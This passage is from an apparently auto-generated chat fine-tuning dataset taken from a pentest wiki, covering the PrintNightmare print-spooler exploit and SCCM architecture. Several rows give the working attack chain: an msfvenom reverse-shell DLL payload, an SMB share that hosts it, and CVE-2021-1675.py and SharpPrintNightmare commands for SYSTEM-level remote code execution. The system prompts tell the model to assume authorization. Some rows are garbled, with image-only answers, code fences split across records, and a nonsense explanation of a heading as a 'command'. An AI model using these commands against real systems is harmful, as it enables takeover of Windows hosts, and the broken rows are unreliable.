specific about tools, flags, and syntax.", "user": "Explain the practical steps for PrintNightmare - The print spooler", "response": "The Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.\n\n3 RPC protocols are registered by the spooler:\n\n* MS-RPRN: Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server synchronously.\n* MS-PAR: Microsoft’s Print System Asynchronous Remote Protocol. It has the same functionalities as MS-RPRN, but works asynchronously.\n* MS-PAN: Microsoft’s Print System Asynchronous Notification Protocol. It is used to receive print status notifications from a print server and to send server-requested responses to those notifications back to the server.", "metadata": {"corpus_index": 976, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe PrintNightmare - PrintNightmare in the context of penetration testing"}, {"role": "assistant", "content": "\"PrintNightmare\" refers to an RCE (Remote Command Execution) vulnerability. If the vulnerable machine is configured to reject remote connection, this vulnerability could still be exploited in an LPE (Local Privilege Escalation) context. \n\nIn a detailed blogpost (here), Cyberwatch describes that the vulnerability lies in the functions allowing remote driver installation by users, RpcAddPrinterDriverEx and RpcAddPrinterDriver:\n\n1. The attacker stores the driver DLL file on a SMB share reachable from the server.\n2. The client creates a DRIVER_INFO_2 object containing the path to the attacker's DLL and passes it into the DRIVER_CONTAINER object.\n3. The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER to load the attacker's DLL into the server's dynamic library and with multiple bit values within the dwFileCopyFlags in order to bypass the SeLoadDriverPrivilege privilege verification by the server.\n4. The attacker's DLL is executed on the server within SYSTEM context."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe PrintNightmare - PrintNightmare in the context of penetration testing", "response": "\"PrintNightmare\" refers to an RCE (Remote Command Execution) vulnerability. If the vulnerable machine is configured to reject remote connection, this vulnerability could still be exploited in an LPE (Local Privilege Escalation) context. \n\nIn a detailed blogpost (here), Cyberwatch describes that the vulnerability lies in the functions allowing remote driver installation by users, RpcAddPrinterDriverEx and RpcAddPrinterDriver:\n\n1. The attacker stores the driver DLL file on a SMB share reachable from the server.\n2. The client creates a DRIVER_INFO_2 object containing the path to the attacker's DLL and passes it into the DRIVER_CONTAINER object.\n3. The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER to load the attacker's DLL into the server's dynamic library and with multiple bit values within the dwFileCopyFlags in order to bypass the SeLoadDriverPrivilege privilege verification by the server.\n4. The attacker's DLL is executed on the server within SYSTEM context.", "metadata": {"corpus_index": 977, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through PrintNightmare - PrintNightmare"}, {"role": "assistant", "content": "\"PrintNightmare\" refers to an RCE (Remote Command Execution) vulnerability. If the vulnerable machine is configured to reject remote connection, this vulnerability could still be exploited in an LPE (Local Privilege Escalation) context. \n\nIn a detailed blogpost (here), Cyberwatch describes that the vulnerability lies in the functions allowing remote driver installation by users, RpcAddPrinterDriverEx and RpcAddPrinterDriver:\n\n1. The attacker stores the driver DLL file on a SMB share reachable from the server.\n2. The client creates a DRIVER_INFO_2 object containing the path to the attacker's DLL and passes it into the DRIVER_CONTAINER object.\n3. The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER to load the attacker's DLL into the server's dynamic library and with multiple bit values within the dwFileCopyFlags in order to bypass the SeLoadDriverPrivilege privilege verification by the server.\n4. The attacker's DLL is executed on the server within SYSTEM context."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through PrintNightmare - PrintNightmare", "response": "\"PrintNightmare\" refers to an RCE (Remote Command Execution) vulnerability. If the vulnerable machine is configured to reject remote connection, this vulnerability could still be exploited in an LPE (Local Privilege Escalation) context. \n\nIn a detailed blogpost (here), Cyberwatch describes that the vulnerability lies in the functions allowing remote driver installation by users, RpcAddPrinterDriverEx and RpcAddPrinterDriver:\n\n1. The attacker stores the driver DLL file on a SMB share reachable from the server.\n2. The client creates a DRIVER_INFO_2 object containing the path to the attacker's DLL and passes it into the DRIVER_CONTAINER object.\n3. The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER to load the attacker's DLL into the server's dynamic library and with multiple bit values within the dwFileCopyFlags in order to bypass the SeLoadDriverPrivilege privilege verification by the server.\n4. The attacker's DLL is executed on the server within SYSTEM context.", "metadata": {"corpus_index": 977, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about PrintNightmare - Constraints"}, {"role": "assistant", "content": "As @StanHacked stated on Twitter, there are some constraints depending on the protocol used for the attack."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about PrintNightmare - Constraints", "response": "As @StanHacked stated on Twitter, there are some constraints depending on the protocol used for the attack.", "metadata": {"corpus_index": 978, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out PrintNightmare - Constraints during a pentest?"}, {"role": "assistant", "content": "As @StanHacked stated on Twitter, there are some constraints depending on the protocol used for the attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out PrintNightmare - Constraints during a pentest?", "response": "As @StanHacked stated on Twitter, there are some constraints depending on the protocol used for the attack.", "metadata": {"corpus_index": 978, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe PrintNightmare - MS-RPRN conditional tree in the context of penetration testing"}, {"role": "assistant", "content": "![](<./assets/PrintNightmare_MS-RPRN.jpeg>)\n\n{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe PrintNightmare - MS-RPRN conditional tree in the context of penetration testing", "response": "![](<./assets/PrintNightmare_MS-RPRN.jpeg>)\n\n{.caption}", "metadata": {"corpus_index": 979, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for PrintNightmare - MS-RPRN conditional tree"}, {"role": "assistant", "content": "![](<./assets/PrintNightmare_MS-RPRN.jpeg>)\n\n{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for PrintNightmare - MS-RPRN conditional tree", "response": "![](<./assets/PrintNightmare_MS-RPRN.jpeg>)\n\n{.caption}", "metadata": {"corpus_index": 979, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain PrintNightmare - MS-PAR conditional tree"}, {"role": "assistant", "content": "[](<./assets/PrintNightmare_MS-PAR.jpeg>)\n\n{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain PrintNightmare - MS-PAR conditional tree", "response": "[](<./assets/PrintNightmare_MS-PAR.jpeg>)\n\n{.caption}", "metadata": {"corpus_index": 980, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for PrintNightmare - MS-PAR conditional tree?"}, {"role": "assistant", "content": "[](<./assets/PrintNightmare_MS-PAR.jpeg>)\n\n{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for PrintNightmare - MS-PAR conditional tree?", "response": "[](<./assets/PrintNightmare_MS-PAR.jpeg>)\n\n{.caption}", "metadata": {"corpus_index": 980, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of PrintNightmare - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom Unix-like systems, the attack can be conducted as follows\n\n1. Check if the target's RPC pipes are available: Impacket's rpcdump.py\n2. Generate a DLL payload: msfvenom\n3. Host an SMB server from which the DLL can be fetched: Impacket's smbserver.py\n4. Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuse, MS-PAR abuse)\n5. Profit from the DLL being executed by the target\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of PrintNightmare - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom Unix-like systems, the attack can be conducted as follows\n\n1. Check if the target's RPC pipes are available: Impacket's rpcdump.py\n2. Generate a DLL payload: msfvenom\n3. Host an SMB server from which the DLL can be fetched: Impacket's smbserver.py\n4. Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuse, MS-PAR abuse)\n5. Profit from the DLL being executed by the target\n\n```bash", "metadata": {"corpus_index": 981, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for PrintNightmare - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom Unix-like systems, the attack can be conducted as follows\n\n1. Check if the target's RPC pipes are available: Impacket's rpcdump.py\n2. Generate a DLL payload: msfvenom\n3. Host an SMB server from which the DLL can be fetched: Impacket's smbserver.py\n4. Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuse, MS-PAR abuse)\n5. Profit from the DLL being executed by the target\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for PrintNightmare - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom Unix-like systems, the attack can be conducted as follows\n\n1. Check if the target's RPC pipes are available: Impacket's rpcdump.py\n2. Generate a DLL payload: msfvenom\n3. Host an SMB server from which the DLL can be fetched: Impacket's smbserver.py\n4. Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuse, MS-PAR abuse)\n5. Profit from the DLL being executed by the target\n\n```bash", "metadata": {"corpus_index": 981, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Create a DLL payload (reverse shell in this example)"}, {"role": "assistant", "content": "msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -o /workspace/smb/remote.dll"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Create a DLL payload (reverse shell in this example)", "response": "msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -o /workspace/smb/remote.dll", "metadata": {"corpus_index": 982, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Create a DLL payload (reverse shell in this example)?"}, {"role": "assistant", "content": "msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -o /workspace/smb/remote.dll"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Create a DLL payload (reverse shell in this example)?", "response": "msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -o /workspace/smb/remote.dll", "metadata": {"corpus_index": 982, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Host a SMB share"}, {"role": "assistant", "content": "smbserver.py -smb2support \"WHATEVERNAME\" /workspace/smb/"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Host a SMB share", "response": "smbserver.py -smb2support \"WHATEVERNAME\" /workspace/smb/", "metadata": {"corpus_index": 983, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Host a SMB share"}, {"role": "assistant", "content": "smbserver.py -smb2support \"WHATEVERNAME\" /workspace/smb/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Host a SMB share", "response": "smbserver.py -smb2support \"WHATEVERNAME\" /workspace/smb/", "metadata": {"corpus_index": 983, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Run the exploit?"}, {"role": "assistant", "content": "CVE-2021-1675.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP '\\\\$LOCAL_IP\\$SHARE\\remote.dll'\n\n``\n\n=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare.\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._\n\n`bash\n#LPE\nC:\\SharpPrintNightmare.exe C:\\addCube.dll\n\n#RCE using existing context\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP'\n\n#RCE using runas /netonly\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP' $DOMAIN $USER $PASSWORD\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Run the exploit?", "response": "CVE-2021-1675.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP '\\\\$LOCAL_IP\\$SHARE\\remote.dll'\n\n``\n\n=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare.\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._\n\n`bash\n#LPE\nC:\\SharpPrintNightmare.exe C:\\addCube.dll\n\n#RCE using existing context\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP'\n\n#RCE using runas /netonly\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP' $DOMAIN $USER $PASSWORD\n``\n\n:::", "metadata": {"corpus_index": 984, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Run the exploit?"}, {"role": "assistant", "content": "CVE-2021-1675.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP '\\\\$LOCAL_IP\\$SHARE\\remote.dll'\n\n``\n\n=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare.\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._\n\n`bash\n#LPE\nC:\\SharpPrintNightmare.exe C:\\addCube.dll\n\n#RCE using existing context\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP'\n\n#RCE using runas /netonly\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP' $DOMAIN $USER $PASSWORD\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Run the exploit?", "response": "CVE-2021-1675.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP '\\\\$LOCAL_IP\\$SHARE\\remote.dll'\n\n``\n\n=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare.\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._\n\n`bash\n#LPE\nC:\\SharpPrintNightmare.exe C:\\addCube.dll\n\n#RCE using existing context\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP'\n\n#RCE using runas /netonly\nSharpPrintNightmare.exe '\\\\$LOCAL_IP\\smb\\addCube.dll' '\\\\$TARGET_IP' $DOMAIN $USER $PASSWORD\n``\n\n:::", "metadata": {"corpus_index": 984, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Run the exploit"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: [https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare).\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Run the exploit", "response": "=== Windows\n\nFrom Windows systems, the attack can be conducted in an LPE or RCE context with the following PoC: [https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare).\n\n> [!CAUTION]\n> _At the time of writing, October 7th 2022, the Windows abuse technique has not been tested by THR's authors._", "metadata": {"corpus_index": 985, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for run the exploit. Run the exploit"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for run the exploit. Run the exploit", "metadata": {"corpus_index": 985, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SCCM / MECM - Theory"}, {"role": "assistant", "content": "The System Center Configuration Manager (SCCM), now (since 2020) known as Microsoft Endpoint Configuration Manager (MECM), is a software developed by Microsoft to help system administrators manage the servers and workstations in large Active Directory environments. It provides lots of features including remote control, patch management, task automation, application distribution, hardware and software inventory, compliance management and security policy administration.\n\nSCCM is an on-premise solution, but Microsoft also maintains a cloud-native client management suite named Intune. Both Intune and SCCM are part of the \"Microsoft Endpoint Manager\" umbrella."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SCCM / MECM - Theory", "response": "The System Center Configuration Manager (SCCM), now (since 2020) known as Microsoft Endpoint Configuration Manager (MECM), is a software developed by Microsoft to help system administrators manage the servers and workstations in large Active Directory environments. It provides lots of features including remote control, patch management, task automation, application distribution, hardware and software inventory, compliance management and security policy administration.\n\nSCCM is an on-premise solution, but Microsoft also maintains a cloud-native client management suite named Intune. Both Intune and SCCM are part of the \"Microsoft Endpoint Manager\" umbrella.", "metadata": {"corpus_index": 986, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for SCCM / MECM - Theory?"}, {"role": "assistant", "content": "The System Center Configuration Manager (SCCM), now (since 2020) known as Microsoft Endpoint Configuration Manager (MECM), is a software developed by Microsoft to help system administrators manage the servers and workstations in large Active Directory environments. It provides lots of features including remote control, patch management, task automation, application distribution, hardware and software inventory, compliance management and security policy administration.\n\nSCCM is an on-premise solution, but Microsoft also maintains a cloud-native client management suite named Intune. Both Intune and SCCM are part of the \"Microsoft Endpoint Manager\" umbrella."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for SCCM / MECM - Theory?", "response": "The System Center Configuration Manager (SCCM), now (since 2020) known as Microsoft Endpoint Configuration Manager (MECM), is a software developed by Microsoft to help system administrators manage the servers and workstations in large Active Directory environments. It provides lots of features including remote control, patch management, task automation, application distribution, hardware and software inventory, compliance management and security policy administration.\n\nSCCM is an on-premise solution, but Microsoft also maintains a cloud-native client management suite named Intune. Both Intune and SCCM are part of the \"Microsoft Endpoint Manager\" umbrella.", "metadata": {"corpus_index": 986, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SCCM / MECM - Topology work?"}, {"role": "assistant", "content": "SCCM operates in a client-server architecture deployed on a \"site\", representing the SCCM environment. The following components may be found in an SCCM installation:\n\n* Primary Site Server: the main SCCM server that manages clients (like distributing software updates) and can have child servers attached to it for scalability purposes. Each SCCM site is identified by a three-character code to distinguish it in an SCCM hierarchy.\n* Secondary Sites: child servers attached to a primary site server, generally deployed for scalability purposes.\n* Passive Site Server: a high-availability component that can be failovered to, if an active Site Server stops.\n* Management Point (MP): an SCCM server role that sits between the site server and clients, providing clients with necessary policies and configuration to communicate with the site server and receive configuration data from them. The management point also uses the site database to retrieve policies and configuration information needed by SCCM clients.\n* Distribution Point (DP): the SCCM component that hosts and distributes software packages, updates, OS images, etc. to clients upon request.\n* Site Database Server: a Microsoft SQL Server (MSSQL) instance that stores all information about clients, software updates, hardware and software inventories, configuration settings of the site, etc. This database is used by the site server to retrieve and store information about managed devices.\n* SMS Provider: provides a set of interfaces between the site server and the site database. It provides clients with valuable information such as available software updates, and allows those clients to communicate information (e.g. status of a software deployment, inventory data to store in the site database). \"SMS\" stands for \"System Management Service\".\n* Central Administration Site (CAS): an optional component used in large environments that host multiple SCCM sites (e.g. a huge company, with one SCCM site per continent). It manages all th"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SCCM / MECM - Topology work?", "response": "SCCM operates in a client-server architecture deployed on a \"site\", representing the SCCM environment. The following components may be found in an SCCM installation:\n\n* Primary Site Server: the main SCCM server that manages clients (like distributing software updates) and can have child servers attached to it for scalability purposes. Each SCCM site is identified by a three-character code to distinguish it in an SCCM hierarchy.\n* Secondary Sites: child servers attached to a primary site server, generally deployed for scalability purposes.\n* Passive Site Server: a high-availability component that can be failovered to, if an active Site Server stops.\n* Management Point (MP): an SCCM server role that sits between the site server and clients, providing clients with necessary policies and configuration to communicate with the site server and receive configuration data from them. The management point also uses the site database to retrieve policies and configuration information needed by SCCM clients.\n* Distribution Point (DP): the SCCM component that hosts and distributes software packages, updates, OS images, etc. to clients upon request.\n* Site Database Server: a Microsoft SQL Server (MSSQL) instance that stores all information about clients, software updates, hardware and software inventories, configuration settings of the site, etc. This database is used by the site server to retrieve and store information about managed devices.\n* SMS Provider: provides a set of interfaces between the site server and the site database. It provides clients with valuable information such as available software updates, and allows those clients to communicate information (e.g. status of a software deployment, inventory data to store in the site database). \"SMS\" stands for \"System Management Service\".\n* Central Administration Site (CAS): an optional component used in large environments that host multiple SCCM sites (e.g. a huge company, with one SCCM site per continent). It manages all th", "metadata": {"corpus_index": 987, "category": "active_directory", "source_file": 